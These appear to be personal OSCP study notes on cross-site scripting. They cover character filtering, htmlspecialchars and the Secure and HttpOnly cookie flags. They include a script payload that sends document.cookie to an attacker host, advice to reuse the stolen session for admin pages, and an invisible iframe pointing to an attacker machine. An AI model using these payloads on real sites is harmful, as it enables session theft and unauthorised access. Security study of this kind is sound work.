Comment on page
special characters
<>
'
"
{}
;
if you inspect the web pages and still see those raw chars, it's vulnerable!
if not properly filtered (PHP) -> "htmlspecialchars" function should be used to properly sanitize it, which convert key characters into HTML entities.
What's cookies and what can we do with them?
cookies -> websites have them to track state info about users. Cookies can be set with flags that are not required. We want to look for Secure and HttpOnly flags
- Secure flags - intruct browser to only send the cookie over encrypted connections
- HttpOnly flags - it denies JavaScript access to the cookie. if it's not set, we can easily steal the cookie by using an XSS.
The following script sends a GET request to the attacker's machine and force the victim to send the cookie (PHPSESSID) with it.
<script>new Image().src="http://Attacker_IP/cool.jpg?output="+document.cookie;</script
If a user logs into the server, we get a call back and steal the cookie.
Use a cookie editor to add the session info and visit an admin only pages!
OSCP book didn't cover any non-client facing XSS.
Client side attacks:
invisible iframe
<iframe src=http://attacker_IP/malicious height=”0” width=”0”></iframe>
people who visit the site that has this invisible iframe will connect back to the attacker's machine!
(attacker can set up a netcat listner)
Last modified 1yr ago